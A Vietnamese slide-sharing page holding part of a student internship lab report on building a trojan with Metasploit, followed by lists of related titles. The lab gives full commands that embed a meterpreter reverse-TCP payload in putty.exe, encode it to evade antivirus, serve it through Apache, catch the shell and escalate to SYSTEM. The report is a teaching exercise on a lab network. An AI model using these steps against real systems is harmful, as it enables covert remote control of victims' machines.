- Sauđó tathử uploadchươngtrìnhlênvirustotalvàkiểmtra kết quảscan ta
đượctỷlệ7/42AV nhậnđâylàvirus
Bài :TạoTrojan bằng Metasploit
1. Mục đích bài lab
- Mụcđíchbàilab: sử dụngcông cụ msfpayloadvà msfencodecó trong Metasploit
đểtạo rafileTrojan. Ta chuẩn bịfilethựcthiexe nào đó. Vídụnhư ở đâytasử dụng
chươngtrìnhputty.exe
- Sử dụng msfpayloadđểtạo backdoor. Sauđó tasử dụng msfencodeđểby pass
antivirus
- Sơđồ bài lab
234
Attacker
192.168.1.0/24 Victim
2. Cácbướcthựchiện
- Đầutiênta copyfile putty.exevào trongmáy backtrack5. Tathựchiệncâu
lệnhbên dưới với giátrịLHOST là IP củaattacker,LPORTlà portmà máy
attackersử dụngđểquảnlý kếtnối. “./msfpayload
windows/meterpreter/reverse_tcp
LHOST=192.168.1.234LPORT=4455R |
./msfencode -e x86/shikata_ga_nai-c 3-t exe -x /root/Desktop/putty.exe-o
/root/Desktop/putty_backdoor.exe“
- Saukhi tạo xong backdoor bướckếtiếplà làmsao gửifile backdoor nàyđến
victim. Ví dụở đâytastart dịchvụ apache2và copyfile nàyvào trongfolder
/var/www
- Khởi động dịchvụapache2và kiểmtra downloadfile
- Saukhitađã chuẩnbịxong mọi thứ tasửdụngtínhnăng
“exploit/multi/handler” đểquảnlý cáckết nối từ máyvictimđếnmáy
attacker.
msf>use exploit/multi/handler
msf exploit(handler)>set payload windows/meterpreter/reverse_tcp
payload=>windows/meterpreter/reverse_tcp msf
exploit(handler)>set LHOST192.168.1.234
msf exploit(handler)>set LPORT4455
LPORT=>4455
msf exploit(handler)>exploit–j
- Victimthựcthi fileputty_backdoor.exethì tại máyattacker sẽcó được1 kết
nốiđiềukhiển.
- Tiếptục ta nhậpvào câulệnh “run post/windows/escalate/bypassuac” thì
metasploit sẽtạo ra1sessions mới.
- Ta kết nối vào sessionssố 5bằng cách nhậpvào câulệnh“background” và
“sessions–l” và“sessions –i 5”
- Thông qua kếtnối mới ta nhậpvào các câulệnhgetprivs,getsystem,getuidđể
ta có quyền systemvới máyvictim.

More Related Content

What's hot

Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1Liên Hán
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDaewoo Han
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTMasterCode.vn
 
Bao cao hoai huy
Bao cao   hoai huyBao cao   hoai huy
Bao cao hoai huyhoaihuysc
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu nataliej4
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
Baigiang atbmttl
Baigiang atbmttlBaigiang atbmttl
Baigiang atbmttlHuynh MVT
 
Huongdansudung packet tracer5.0
Huongdansudung packet tracer5.0Huongdansudung packet tracer5.0
Huongdansudung packet tracer5.0thanhyu
 
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp
 
Báo cáo thực tập tuần 2
Báo cáo thực tập tuần 2Báo cáo thực tập tuần 2
Báo cáo thực tập tuần 2Huy Bach
 

What's hot (19)

Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
 
Dacs snort
Dacs snortDacs snort
Dacs snort
 
Bao cao hoai huy
Bao cao   hoai huyBao cao   hoai huy
Bao cao hoai huy
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu
 
Huong dan backtrack
Huong dan backtrackHuong dan backtrack
Huong dan backtrack
 
Slide c1
Slide c1Slide c1
Slide c1
 
Bao cao
Bao caoBao cao
Bao cao
 
Tường lửa ip cop
Tường lửa ip copTường lửa ip cop
Tường lửa ip cop
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
Baigiang atbmttl
Baigiang atbmttlBaigiang atbmttl
Baigiang atbmttl
 
Huongdansudung packet tracer5.0
Huongdansudung packet tracer5.0Huongdansudung packet tracer5.0
Huongdansudung packet tracer5.0
 
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
 
Báo cáo thực tập tuần 2
Báo cáo thực tập tuần 2Báo cáo thực tập tuần 2
Báo cáo thực tập tuần 2
 

Similar to Bao cao thuc tap athena tuan 1 2-3

It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thanglaonap166
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thanglaonap166
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1Con Ranh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1Anhh Hữu
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDaewoo Han
 
Aircrack-ng.pdf
Aircrack-ng.pdfAircrack-ng.pdf
Aircrack-ng.pdfHongoHuy
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploitLê Lãnh
 
Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011laonap166
 
Đề Tài Thực Hành CCNA Lab - CSMars.pdf
Đề Tài Thực Hành CCNA Lab - CSMars.pdfĐề Tài Thực Hành CCNA Lab - CSMars.pdf
Đề Tài Thực Hành CCNA Lab - CSMars.pdfNuioKila
 
Báo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- AthenaBáo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- Athenaquocluong
 
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athenaquocluong
 
Athena báo cáo thực tập tốt nghiệp 03
Athena báo cáo thực tập tốt nghiệp 03Athena báo cáo thực tập tốt nghiệp 03
Athena báo cáo thực tập tốt nghiệp 03Huỳnh Thông
 

Similar to Bao cao thuc tap athena tuan 1 2-3 (20)

It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thang
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thang
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Aircrack-ng.pdf
Aircrack-ng.pdfAircrack-ng.pdf
Aircrack-ng.pdf
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Bc athena cuoi ky
Bc athena cuoi kyBc athena cuoi ky
Bc athena cuoi ky
 
Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011
 
Đề Tài Thực Hành CCNA Lab - CSMars.pdf
Đề Tài Thực Hành CCNA Lab - CSMars.pdfĐề Tài Thực Hành CCNA Lab - CSMars.pdf
Đề Tài Thực Hành CCNA Lab - CSMars.pdf
 
Báo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- AthenaBáo Cáo Thực Tập- Athena
Báo Cáo Thực Tập- Athena
 
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athena
 
Athena báo cáo thực tập tốt nghiệp 03
Athena báo cáo thực tập tốt nghiệp 03Athena báo cáo thực tập tốt nghiệp 03
Athena báo cáo thực tập tốt nghiệp 03
 

Recently uploaded

Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptxNhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptxhoangvubaongoc112011
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...Nguyen Thanh Tu Collection
 
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quanGNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quanmyvh40253
 
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIĐiện Lạnh Bách Khoa Hà Nội
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...Nguyen Thanh Tu Collection
 
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoáCác điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoámyvh40253
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngYhoccongdong.com
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢImyvh40253
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfNguyen Thanh Tu Collection
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docxTHAO316680
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...Nguyen Thanh Tu Collection
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdfTrnHoa46
 
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfhoangtuansinh1
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhdtlnnm
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-KhnhHuyn546843
 
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfCampbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfTrnHoa46
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...Nguyen Thanh Tu Collection
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...hoangtuansinh1
 

Recently uploaded (20)

Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptxNhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
Nhiễm khuẩn tiêu hóa-Tiêu chảy do vi khuẩn.pptx
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
 
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quanGNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
GNHH và KBHQ - giao nhận hàng hoá và khai báo hải quan
 
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
3-BẢNG MÃ LỖI CỦA CÁC HÃNG ĐIỀU HÒA .pdf - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
 
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoáCác điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
 
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng ĐồngGiới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
Giới thiệu Dự án Sản Phụ Khoa - Y Học Cộng Đồng
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
 
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
1.DOANNGOCPHUONGTHAO-APDUNGSTEMTHIETKEBTHHHGIUPHSHOCHIEUQUA (1).docx
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI KỸ NĂNG VIẾT ĐOẠN VĂN NGHỊ LUẬN XÃ HỘI 200 C...
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdf
 
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
 
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfCampbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
 
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
ĐỀ CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT CÁC TỈNH THÀNH NĂM HỌC 2020 –...
 
Danh sách sinh viên tốt nghiệp Đại học - Cao đẳng Trường Đại học Phú Yên năm ...
